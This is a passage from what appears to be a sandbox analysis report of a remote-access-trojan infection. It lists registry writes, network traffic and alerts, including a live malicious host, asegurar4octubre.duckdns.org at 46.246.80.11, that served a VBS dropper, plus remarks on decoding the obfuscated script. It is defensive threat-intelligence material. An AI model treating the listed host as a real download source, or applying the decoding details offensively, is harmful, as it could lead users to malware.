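```

Two details matter when running this against a real capture: the blob is UTF-16LE, so decoding it as UTF-8 yields text interleaved with NUL bytes and the later string replacements silently fail to match; and the order of the `.replace()` calls is significant, since the glyph substitution must be undone before base64 decoding while the placeholder substitution is applied to the decoded script.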
Total events
23 935
Read events
23 872
Write events
61
Delete events
2

Modification events

PID: 6736  Process: iexplore.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write  Name: CachePrefix  Value: (empty)

PID: 6736  Process: iexplore.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write  Name: CachePrefix  Value: Cookie:

PID: 6736  Process: iexplore.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write  Name: CachePrefix  Value: Visited:

PID: 6736  Process: iexplore.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main
Operation: write  Name: CompatibilityFlags  Value: 0

PID: 6736  Process: iexplore.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation: write  Name: SecuritySafe  Value: 1

PID: 6736  Process: iexplore.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main
Operation: write  Name: DisableFirstRunCustomize  Value: 1

PID: 6864  Process: msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\Clients\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\Commands\on-logon-autolaunch
Operation: write  Name: Enabled  Value: 0

PID: 6864  Process: msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write  Name: MicrosoftEdgeAutoLaunch_29EBC4579851B72EE312C449CF839B1A  Value: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
(This Run entry is Edge's own startup-boost value written by the browser itself; it is not part of the RAT chain.)

PID: 6864  Process: msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\Profiles
Operation: write  Name: EnhancedLinkOpeningDefault  Value: Default

PID: 6864  Process: msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\262842
Operation: write  Name: WindowTabManagerFileMappingId  Value: {326DD1AD-5BBE-41B3-A3F7-751EC3FB3C23}
Executable files
11
Suspicious files
208
Text files
63
Unknown types
0

Dropped files

PID   Process     Filename
6864  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF135caa.TMP
6864  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old
6864  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF135cc9.TMP
6864  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF135cc9.TMP
6864  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
6864  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old
6864  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF135ce8.TMP
6864  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
6864  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF135ce8.TMP
6864  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
(Type, MD5 and SHA256 are empty for these rows in the report; none of the 11 executable files counted above appears in this excerpt.)
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
62
TCP/UDP connections
78
DNS requests
78
Threats
41

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1684 svchost.exe | GET 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
4712 MoUsoCoreWorker.exe | GET 200 | 95.101.54.224:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
4712 MoUsoCoreWorker.exe | GET 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
(no PID) | GET 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | whitelisted
1176 svchost.exe | GET 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
(no PID) | GET 200 | 46.246.80.11:80 | http://asegurar4octubre.duckdns.org/ | unknown | unknown
(no PID) | GET 200 | 46.246.80.11:80 | http://asegurar4octubre.duckdns.org/icons/blank.gif | unknown | unknown
(no PID) | GET 200 | 46.246.80.11:80 | http://asegurar4octubre.duckdns.org/icons/unknown.gif | unknown | unknown
(no PID) | GET 404 | 46.246.80.11:80 | http://asegurar4octubre.duckdns.org/favicon.ico | unknown | unknown
(no PID) | GET 200 | 46.246.80.11:80 | http://asegurar4octubre.duckdns.org/icons/blank.gif | unknown | unknown

The /icons/blank.gif and /icons/unknown.gif requests are the stock icons of an Apache-style directory listing, which is what the opendir tag refers to: the landing URL serves a directory index rather than a page. The report does not show the download itself, but the file wscript.exe (PID 4992) ran, C:\Users\admin\Downloads\sostener2.vbs, sits in the browser's download folder.

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4 System | 192.168.100.255:137 | whitelisted
(no PID) | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4712 MoUsoCoreWorker.exe | 95.101.54.224:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
4712 MoUsoCoreWorker.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted
1684 svchost.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted
4 System | 192.168.100.255:138 | whitelisted
5064 SearchApp.exe | 184.86.251.22:443 | www.bing.com | Akamai International B.V. | DE | whitelisted
(no PID) | 184.30.131.245:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted
1176 svchost.exe | 40.126.31.131:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1176 svchost.exe | 184.30.131.245:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted
(The MSBuild.exe connection flagged above as "Contacting a server suspected of hosting an CnC" / "Connects to unusual port" is not among the rows in this excerpt; see the full report.)

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
crl.microsoft.com
  • 95.101.54.224
  • 95.101.54.240
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 184.30.21.171
whitelisted
google.com
  • 142.250.185.78
whitelisted
www.bing.com
  • 184.86.251.22
  • 184.86.251.7
  • 184.86.251.9
  • 184.86.251.27
  • 23.15.178.147
  • 23.15.178.226
  • 2.23.227.215
  • 2.23.227.208
whitelisted
ocsp.digicert.com
  • 184.30.131.245
  • 2.17.190.73
whitelisted
login.live.com
  • 40.126.31.131
  • 40.126.31.128
  • 20.190.159.64
  • 40.126.31.69
  • 40.126.31.71
  • 20.190.159.2
  • 40.126.31.130
  • 40.126.31.129
whitelisted
asegurar4octubre.duckdns.org
  • 46.246.80.11
unknown
config.edge.skype.com
  • 13.107.42.16
whitelisted
edge.microsoft.com
  • 204.79.197.239
  • 13.107.21.239
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
Process
Message
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
VerifyLibrary: error while getting certificate informations
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3